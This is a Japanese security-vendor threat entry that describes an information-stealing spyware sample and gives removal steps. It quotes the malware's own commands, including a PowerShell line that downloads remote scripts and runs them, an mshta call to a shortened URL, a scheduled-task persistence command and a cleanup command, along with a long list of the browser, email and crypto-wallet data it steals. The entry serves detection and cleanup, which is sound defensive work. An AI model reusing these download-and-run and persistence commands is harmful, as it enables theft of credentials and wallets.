TrojanSpy.P97M.VALYRIA.YXBEZ
W97M/Downloader.doj (NAI)
Windows
- マルウェアタイプ: スパイウェア/情報窃取型
- 破壊活動の有無: なし
- 暗号化: なし
- 感染報告の有無: はい
概要
スパイウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
スパイウェアは、特定のWebサイトからファイルをダウンロードし、ファイル名を変更した後、感染コンピュータ内に保存します。
スパイウェアは、特定のWebサイトにアクセスし、情報を送受信します。
詳細
侵入方法
スパイウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
スパイウェアは、以下のフォルダを追加します。
- where stolen information is stored/copied to:
- %ProgramData%\{randomly generated number}
- %ProgramData%\{randomly generated number}\cc
- %ProgramData%\{randomly generated number}\autofill
- %ProgramData%\{randomly generated number}\cookies
- %ProgramData%\{randomly generated number}\crypto
(註:%ProgramData%フォルダは、マルチユーザーシステムにおいて任意のユーザがプログラムに変更を加えることができるプログラムファイルフォルダのバージョンです。これには、すべてのユーザのアプリケーションデータが含まれます。Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\ProgramData" です。Windows Server 2003(32-bit)、2000(32-bit)、XPの場合、通常 "C:\Documents and Settings\All Users" です。 )
スパイウェアは、以下のファイルを作成します。
- where gathered information is stored:
- %ProgramData%\{randomly generated number}\{application}
- %ProgramData%\{randomly generated number}\passwords.txt
- %ProgramData%\{randomly generated number}\temp
- %ProgramData%\{randomly generated number}\system.txt → gathered system information
- %ProgramData%\{randomly generated number}\screenshot.jpg → screenshot of current display
- where gathered information is archived before exfiltrated:
- %ProgramData%\{randomly generated number}\_{randomly generated number}.zip
(註:%ProgramData%フォルダは、マルチユーザーシステムにおいて任意のユーザがプログラムに変更を加えることができるプログラムファイルフォルダのバージョンです。これには、すべてのユーザのアプリケーションデータが含まれます。Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\ProgramData" です。Windows Server 2003(32-bit)、2000(32-bit)、XPの場合、通常 "C:\Documents and Settings\All Users" です。 )
スパイウェアは、以下のプロセスを追加します。
- "%System%\mshta.exe" "http://www.j.mp/{redirection to specific number}"
- "%System%\WindowsPowerShell\v1.0\powershell.exe" i'E'x(iwr('https://i{BLOCKED}.us.archive.org/26/items/120-Crypted-03-June/{number}-1.txt') -useB);i'E'x(iwr('https://i{BLOCKED}.us.archive.org/26/items/120-Crypted-03-June/{number}-2.txt') -useB);i'E'x(iwr('https://i{BLOCKED}.us.archive.org/26/items/120-Crypted-03-June/{number}-3.txt') -useB);
- starts the following processes:
- %Windows%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
- %Windows%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
- starts the following processes:
- "%System%\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://1230948%{BLOCKED}x.blogspot.com/p/{number}.html\"
- #cmd
- "{path}"
- "%System%\cmd.exe" /c taskkill /pid {PID of injectedaspnet_compiler.exe } & erase %Windows%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe & RD /S /Q %ProgramData%\{randomly generated number}\* & exit
スパイウェアは、以下のプロセスにコードを組み込みます。
- %Windows%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
- %Windows%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
(註:%Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)
他のシステム変更
スパイウェアは、以下のファイルを削除します。
- after exfiltration:
- %ProgramData%\sqlite3.dll
- %ProgramData%\freebl3.dll
- %ProgramData%\mozglue.dll
- %ProgramData%\msvcp140.dll
- %ProgramData%\nss3.dll
- %ProgramData%\softokn3.dll
- %ProgramData%\vcruntime140.dll
- %Windows%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
(註:%Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)
スパイウェアは、以下のフォルダを削除します。
- after exfiltration:
- %ProgramData%\{randomly generated number}
- %ProgramData%\{randomly generated number}\cc
- %ProgramData%\{randomly generated number}\autofill
- %ProgramData%\{randomly generated number}\cookies
- %ProgramData%\{randomly generated number}\crypto
(註:%ProgramData%フォルダは、マルチユーザーシステムにおいて任意のユーザがプログラムに変更を加えることができるプログラムファイルフォルダのバージョンです。これには、すべてのユーザのアプリケーションデータが含まれます。Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\ProgramData" です。Windows Server 2003(32-bit)、2000(32-bit)、XPの場合、通常 "C:\Documents and Settings\All Users" です。 )
ダウンロード活動
スパイウェアは、以下のWebサイトからファイルをダウンロードし、ファイル名を変更した後、感染コンピュータ内に保存します。
- Short URLs of initial connection:
- http://www.j.mp/{redirection to specific resource}
- http://bit.ly/{redirection to specific resource}
- redirected to:
- https://{BLOCKED}.blogspot.com/p/{number}.html → remote executes powershell/schtask for persistence
- redirected to:
- https://{BLOCKED}63-7ecd-45e2-9eab-f8d98aab177f.{BLOCKED}es.com/ugd/73cceb_4906e68401a54bdf99cdcca2ef189f9d.txt → connects to the following URLs which downloads files and executes kuchb.vbs
- https://{BLOCKED}63-7ecd-45e2-9eab-f8d98aab177f.{BLOCKED}es.com/ugd/73cceb_c28bcff4b4ac4d648a44cba2612ce3a6.txt → clone.vbs
- https://{BLOCKED}63-7ecd-45e2-9eab-f8d98aab177f.{BLOCKED}es.com/ugd/73cceb_d6327f9589c84101ad8724c9d6eaea23.txt → kuchb.vbs
- https://{BLOCKED}63-7ecd-45e2-9eab-f8d98aab177f.{BLOCKED}es.com/ugd/73cceb_8c96b0913b2d43038ded2f06e3ee527b.txt → batman.bat
スパイウェアは、以下のファイル名でダウンロードしたファイルを保存します。
- %Public%\batman.bat → starts clone.vbs
- %Public%\kuchb.vbs → persistence for batman.bat
- %Public%\clone.vbs → disables security in infected machine
- %ProgramData%\sqlite3.dll
- %ProgramData%\freebl3.dll
- %ProgramData%\mozglue.dll
- %ProgramData%\msvcp140.dll
- %ProgramData%\nss3.dll
- %ProgramData%\softokn3.dll
- %ProgramData%\vcruntime140.dll
(註:%Public%フォルダは、すべてのユーザ共通のファイルまたはフォルダのリポジトリとして機能するフォルダです。Windows Vista、7、8の場合、通常 "C:\Users\Public" です。. %ProgramData%フォルダは、マルチユーザーシステムにおいて任意のユーザがプログラムに変更を加えることができるプログラムファイルフォルダのバージョンです。これには、すべてのユーザのアプリケーションデータが含まれます。Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\ProgramData" です。Windows Server 2003(32-bit)、2000(32-bit)、XPの場合、通常 "C:\Documents and Settings\All Users" です。 )
情報漏えい
スパイウェアは、以下の情報を収集します。
- Screenshot of current display
- System Information
- OS version
- Username
- Computer Name
- System Language
- Machine ID
- GUID
- Domain Name
- Workgroup
- Keyboard Language
- Hardware Information
- Processor
- # of Logical processors
- Videocard
- Display resolution
- RAM
- If desktop or laptop
- Local Time & Zone
- Network Information
- IP Address
- Country
- Installed Software & version
- Browser autofills, cookies & Login data from the followings:
- Amigo
- Blackhawk
- Brave
- Cent Browser
- Chromium
- CocCoc Browser
- Comodo Dragon
- CryptoTab
- Cyberfox
- Elements Browser
- Epic Privacy Browser
- Google Chrome
- IceCat
- KMeleon
- Kometa
- Maxthon5
- Mozilla Firefox
- Nichrome
- Opera
- Orbitum
- Pale Moon
- QIP Surf
- Sputnik
- TorBro
- Torch
- Uran Broswer
- Vivaldi
- Waterfox
- Email credentials:
- Thunderbird
- Outlook
- stored credit card information
- stored bitcoin wallets:
- Anoncoin
- BBQCoin
- Bitcoin
- DashCore
- Electrum
- Electrum-LTC
- Ethereum
- Exodus
- Florincoin
- Franko
- Freicoin
- GoldCoinGLD
- IOCoin
- Ixcoin
- Litecoin
- Megacoin
- Mincoin
- Multidoge
- Namecoin
- Primecoin
- Terracoin
- YACoin
- Zcash
- devcoin
- digitalcoin
- jaxx
その他
スパイウェアは、以下のWebサイトにアクセスし、情報を送受信します。
- http://{BLOCKED}.{BLOCKED}.107.28/l{number}//main.php
- http://{BLOCKED}.{BLOCKED}.107.28/l{number}/
対応方法
手順 1
Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
Windowsをセーフモードで再起動します。
手順 4
スケジュールされたタスクを削除する
タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。
- Task Name: SECOTAKSA
- Task to be run: \MsHtA\http://1230948%{BLOCKED}x.blogspot.com/p/{number}.html\
Windows 2000、Windows XP、Windows Server 2003の場合:
- [スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
- 上記の{タスク名} を、[名前]の欄に入力します。
- 入力した{タスク名} 持つファイルを右クリックします。
- [プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
- 上記の{実行するタスク}と文字列が一致するタスクを削除します。
Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合:
- Windowsタスクスケジューラを開きます。
• Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
• Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。 - 左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
- 中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
- 中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
- 文字列が一致するタスクを削除します。
手順 5
以下のファイルを検索し削除します。
- %Public%\batman.bat
- %Public%\kuchb.vbs
- %Public%\clone.vbs
手順 6
コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「TrojanSpy.P97M.VALYRIA.YXBEZ」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください